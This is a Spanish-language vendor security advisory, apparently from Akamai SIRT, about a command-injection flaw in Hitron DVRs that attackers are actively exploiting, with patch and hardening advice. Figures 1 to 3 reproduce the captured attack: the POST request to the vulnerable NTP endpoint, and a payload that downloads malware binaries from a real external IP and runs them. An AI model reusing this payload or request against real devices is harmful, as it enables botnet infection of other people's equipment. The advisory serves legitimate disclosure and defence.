¿Necesita Cloud Computing? Empiece ahora

Vulnerabilidad explotada de forma activa en dispositivos DVR de Hitron: corregida, parches disponibles

Akamai Wave Blue

escrito por

Aline Eliovich, Kyle Lefton, Chad Seaman, y Larry Cashdollar

January 30, 2024

Aline Eliovich

escrito por

Aline Eliovich

Aline Eliovich, con seis años de experiencia en el campo de la seguridad, trabaja actualmente como investigadora del equipo de respuesta a incidentes e inteligencia en seguridad de Akamai. Estudió informática en el Holon Technology Institute. Aline disfruta usando diferentes métodos de Inteligencia de código abierto (OSINT) para su investigación.

Onda azul de Akamai

escrito por

Kyle Lefton

Kyle Lefton es un becario de investigación en seguridad en el equipo de respuesta a incidentes e inteligencia en seguridad de Akamai. Kyle, anteriormente analista de inteligencia del Departamento de Defensa de EE. UU., cuenta con una experiencia de varios años en ciberdefensa, investigación de amenazas y contrainteligencia. Se enorgullece de investigar las amenazas emergentes, la investigación de vulnerabilidades y la detección de grupos de amenazas. En su tiempo libre, le gusta pasar tiempo con amigos y familiares, los juegos de estrategia y el senderismo al aire libre.

Chad Seaman headshot

escrito por

Chad Seaman

Chad Seaman es investigador principal de seguridad y jefe del equipo de respuesta a incidentes e inteligencia en seguridad de Akamai. Se refiere orgullosamente a sí mismo como "detector de basura en Internet" y disfruta revisando los desechos que allí encuentra. Chad comenzó su carrera como programador y, después de estar expuesto a la seguridad, la explotación y los análisis forenses a través de investigaciones de filtración, la seguridad se convirtió rápidamente en su trabajo preferido. Ahora se dedica a investigaciones de malware, ingeniería inversa, investigación de vulnerabilidades, DDoS e investigaciones de ciberdelincuencia. Le gusta volar aviones, hacer agujeros en el papel a distancia y pasar tiempo en la naturaleza, preferiblemente sobre una moto de cross por una pista en el bosque.

Larry Cashdollar

escrito por

Larry Cashdollar

Larry W. Cashdollar lleva más de 18 años trabajando en el campo de la seguridad como investigador de vulnerabilidades y actualmente es miembro del equipo de Respuesta a Incidentes de Seguridad de Akamai Technologies. Estudió Informática en la Universidad del Sur de Maine, ha documentado más de 150 vulnerabilidades y exposiciones comunes (CVE) e incluso ha presentado su investigación en BSides Boston, OWASP Rhode Island y Defcon. En su tiempo libre, le gusta hacer actividades al aire libre y reconstruir motores de minibicicletas.

Como parte del descubrimiento de InfectedSlurs, el SIRT de Akamai detectó vulnerabilidades en varios modelos de dispositivos DVR de Hitron que se están explotando en el mundo real.

Resumen ejecutivo

Lo que necesita saber

Como parte del descubrimiento de InfectedSlurs, el SIRT de Akamai detectó vulnerabilidades en varios modelos de dispositivos DVR de Hitron que se están explotando en el mundo real. Los dispositivos Hitron los fabrica Hitron Systems en Corea del Sur.

Esta vulnerabilidad permite que un atacante autenticado consiga inyectar comandos del sistema operativo con una carga útil que se entrega a través de una solicitud POST a la interfaz de gestión. En su configuración actual, utiliza las credenciales predeterminadas del dispositivo en las cargas útiles capturadas.

Los dispositivos y las versiones de firmware afectados son:

  • DVR HVR-4781: versiones de la 1.03 a la 4.02

  • DVR HVR-8781: versiones de la 1.03 a la 4.02

  • DVR HVR-16781: versiones de la 1.03 a la 4.02

  • DVR LGUVR-4H: versiones de la 1.02 a la 4.02

  • DVR LGUVR-8H: versiones de la 1.02 a la 4.02

  • DVR LGUVR-16H: versiones de la 1.02 a la 4.02

El proveedor (Hitron Systems) ha publicado nuevas versiones de firmware para abordar las vulnerabilidades. El proveedor sugiere actualizar a la versión de firmware ≥ 4.03 para todos los modelos afectados lo antes posible. Los avisos también han sido publicados por CISA y KISA. KISA también ha publicado avisos relativos a CVE individuales, que se pueden encontrar en los siguientes enlaces:

Explotación observada

A finales de octubre de 2023, los analistas del equipo SIRT de Akamai observaron un aumento de la actividad en nuestros señuelos dirigida a un puerto TCP que rara vez ha sufrido un uso indebido. Las sondas eran de baja frecuencia y parecía que intentaban primero una autenticación a través de una solicitud POST a /cgi-bin/system_ntp.cgi (Figura 1) seguida de un intento de explotación de inyección de comandos (Figura 2).  Los dispositivos objetivo son los dispositivos DVR de Hitron Systems que son vulnerables a la RCE mediante la inyección de comandos (Figura 3). Una vez autenticado, el atacante ataca la vulnerabilidad de inyección de comandos en el parámetro timeserver mediante una solicitud POST a /cgi-bin/system_ntp.cgi.

  URL: /cgi-bin/system_ntp.cgi

  POST BODY:
  enc=11&ip=[targeted IP]&username=[REDACTED]&password=[REDACTED]

Fig. 1: Intento de autenticación

  URL: /cgi-bin/system_ntp.cgi

  POST BODY:
  lang=ja&useNTPServer=1&synccheck=1&public=0&timeserver=[RCE 
  PAYLOAD]&interval=60&enableNTPServer=1

Fig. 2: Intento de explotación

  curl+http://45.142.182.96/spl/mips+-O;+chmod+777+mips;+./mips+kdvr;curl+http://45.142.182.96/spl/x86+-O;+chmod+777+x86;+./x86+kdvr;curl+http://45.142.182.96/spl/mpsl+-O;+chmod+777+mpsl;+./mpsl+kdvr;curl+http://45.142.182.96/spl/arm+-O;+chmod+777+arm;+./arm+kdvr;curl+http://45.142.182.96/spl/arm5+-O;+chmod+777+arm5;+./arm5+kdvr;curl+http://45.142.182.96/spl/arm6+-O;+chmod+777+arm6;+./arm6+kdvr;curl+http/45.142.182.96/spl/arm7+-O;+chmod+777+arm7;+./arm7+kdvr

Fig. 3: Carga útil de RCE capturada

Protección

Los usuarios de DVR de Hitron que utilicen dispositivos afectados por esta vulnerabilidad deben actualizarlos inmediatamente a las versiones de firmware más recientes disponibles (≥ 4.03), que corrigen la vulnerabilidad de RCE.  

Además, como protección frente a esta y futuras amenazas, se deben implementar diversas medidas de seguridad. En primer lugar, las organizaciones y las personas que utilicen los dispositivos afectados deben cambiar las credenciales de inicio de sesión predeterminadas de inmediato para reforzar la seguridad. La supervisión periódica del tráfico de red y los registros puede ayudar a detectar con antelación las actividades sospechosas. La instalación puntual de parches y actualizaciones de seguridad del fabricante del dispositivo es crucial para solucionar la vulnerabilidad identificada.

La colaboración con investigadores de seguridad, proveedores de información sobre amenazas y otros profesionales del sector puede ayudarle a mantenerse informado sobre las amenazas y las vulnerabilidades emergentes. Por último, el mantenimiento de un inventario actualizado de dispositivos conectados y la implementación de una segmentación de red pueden limitar el posible impacto de dichos ataques.

Conclusión

Abordar los problemas de seguridad identificados en los sistemas de Hitron y los dispositivos asociados requiere un enfoque polifacético que combine la concienciación del usuario, la aplicación rápida de parches, una supervisión proactiva y la colaboración dentro de la comunidad de la ciberseguridad. Con la adopción de estas medidas, las organizaciones y las personas pueden reducir significativamente los riesgos que conlleva la actividad maliciosa observada.

Manténgase informado

Para mantenerse al día sobre las amenazas y otros hallazgos del SIRT y otros grupos de investigación de seguridad de Akamai, síganos en X (anteriormente Twitter) o consulte nuestro centro SIG.

Akamai SIRT desea expresar su agradecimiento al personal de CISA, US-CERT y KISA por la ayuda prestada para informar sobre estas vulnerabilidades a los proveedores.



Akamai Wave Blue

escrito por

Aline Eliovich, Kyle Lefton, Chad Seaman, y Larry Cashdollar

January 30, 2024

Aline Eliovich

escrito por

Aline Eliovich

Aline Eliovich, con seis años de experiencia en el campo de la seguridad, trabaja actualmente como investigadora del equipo de respuesta a incidentes e inteligencia en seguridad de Akamai. Estudió informática en el Holon Technology Institute. Aline disfruta usando diferentes métodos de Inteligencia de código abierto (OSINT) para su investigación.

Onda azul de Akamai

escrito por

Kyle Lefton

Kyle Lefton es un becario de investigación en seguridad en el equipo de respuesta a incidentes e inteligencia en seguridad de Akamai. Kyle, anteriormente analista de inteligencia del Departamento de Defensa de EE. UU., cuenta con una experiencia de varios años en ciberdefensa, investigación de amenazas y contrainteligencia. Se enorgullece de investigar las amenazas emergentes, la investigación de vulnerabilidades y la detección de grupos de amenazas. En su tiempo libre, le gusta pasar tiempo con amigos y familiares, los juegos de estrategia y el senderismo al aire libre.

Chad Seaman headshot

escrito por

Chad Seaman

Chad Seaman es investigador principal de seguridad y jefe del equipo de respuesta a incidentes e inteligencia en seguridad de Akamai. Se refiere orgullosamente a sí mismo como "detector de basura en Internet" y disfruta revisando los desechos que allí encuentra. Chad comenzó su carrera como programador y, después de estar expuesto a la seguridad, la explotación y los análisis forenses a través de investigaciones de filtración, la seguridad se convirtió rápidamente en su trabajo preferido. Ahora se dedica a investigaciones de malware, ingeniería inversa, investigación de vulnerabilidades, DDoS e investigaciones de ciberdelincuencia. Le gusta volar aviones, hacer agujeros en el papel a distancia y pasar tiempo en la naturaleza, preferiblemente sobre una moto de cross por una pista en el bosque.

Larry Cashdollar

escrito por

Larry Cashdollar

Larry W. Cashdollar lleva más de 18 años trabajando en el campo de la seguridad como investigador de vulnerabilidades y actualmente es miembro del equipo de Respuesta a Incidentes de Seguridad de Akamai Technologies. Estudió Informática en la Universidad del Sur de Maine, ha documentado más de 150 vulnerabilidades y exposiciones comunes (CVE) e incluso ha presentado su investigación en BSides Boston, OWASP Rhode Island y Defcon. En su tiempo libre, le gusta hacer actividades al aire libre y reconstruir motores de minibicicletas.